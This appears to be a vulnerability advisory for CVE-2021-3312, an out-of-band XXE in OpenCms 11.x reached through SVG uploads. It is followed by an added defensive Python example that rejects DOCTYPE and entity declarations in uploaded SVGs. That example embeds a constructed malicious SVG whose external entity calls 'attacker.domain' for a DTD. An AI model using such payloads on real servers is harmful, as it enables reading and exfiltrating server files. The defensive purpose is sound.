In OpenCms 11.x, it is possible for logged-in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVG files.
Example in which the first line of /etc/issue is read and sent to the server "attacker.domain":
The SVG file to upload:
The evil.xml file served by the external server "attacker.domain":
CVE ID: CVE-2021-3312.
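The report above describes an out-of-band XXE: the uploaded SVG carries a DOCTYPE whose external parameter entity fetches a DTD from the attacker host, and that DTD defines entities that read a local file and embed its first line in a URL requested from the attacker host. The following is an added example, not the reporter's files and not OpenCms code: it constructs a sample SVG in that generic shape (reusing only the "attacker.domain" host name from the report) and shows the pre-parse check an upload handler should apply, since SVG rendering never needs a DOCTYPE or entity declaration.

```python
"""Added example: reject DOCTYPE/ENTITY declarations in uploaded SVGs before any
XML parser sees them. The payload below is a constructed illustration of the
generic out-of-band XXE pattern, not the SVG from the OpenCms report."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: an external parameter entity pulls a DTD (the "evil.xml"
# role in the report) from the attacker host. Nothing here is fetched; the
# bytes only exist to exercise the check.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY % remote SYSTEM "http://attacker.domain/evil.xml">
  %remote;
]>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10"/>
</svg>
"""

# Constructed benign upload for comparison.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4"/>
</svg>
"""

SVG_NS_TAG = "{http://www.w3.org/2000/svg}svg"

_FORBIDDEN = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def _normalize(data: bytes) -> str:
    """Decode to text before matching, so a UTF-16 encoded upload (which an XML
    parser would happily accept) cannot slip a DOCTYPE past a byte-level regex."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def svg_upload_is_safe(data: bytes) -> bool:
    """True only if the document contains no DOCTYPE and no ENTITY declaration.
    Both are rejected outright rather than inspected: a legitimate SVG does not
    need either, and any parser that honours them is one entity away from XXE."""
    return _FORBIDDEN.search(_normalize(data)) is None


def parse_svg_root(data: bytes) -> str:
    """Gate the upload, then parse it and confirm the root really is an SVG
    element. Raises ValueError on anything the gate rejects."""
    if not svg_upload_is_safe(data):
        raise ValueError("SVG upload rejected: DOCTYPE or entity declaration present")
    root = ET.fromstring(_normalize(data))
    if root.tag != SVG_NS_TAG:
        raise ValueError(f"not an SVG document: root is {root.tag}")
    return root.tag


if __name__ == "__main__":
    print("benign:", svg_upload_is_safe(BENIGN_SVG), parse_svg_root(BENIGN_SVG))
    print("malicious:", svg_upload_is_safe(MALICIOUS_SVG))
    print("malicious as UTF-16:", svg_upload_is_safe(MALICIOUS_SVG.decode().encode("utf-16")))
```

The regex gate is a defence in depth, not a replacement for a hardened parser: whatever component later parses the file (for OpenCms that is a Java stack) must also be configured to disallow DOCTYPE declarations and to disable external general and parameter entities, e.g. the `http://apache.org/xml/features/disallow-doctype-decl` feature on a JAXP `DocumentBuilderFactory`. Note that the exfiltration channel in the report is a URL, which is why only the first line of /etc/issue travels: a newline in the file breaks the entity value, so single-line files such as /etc/issue are the typical target for this variant.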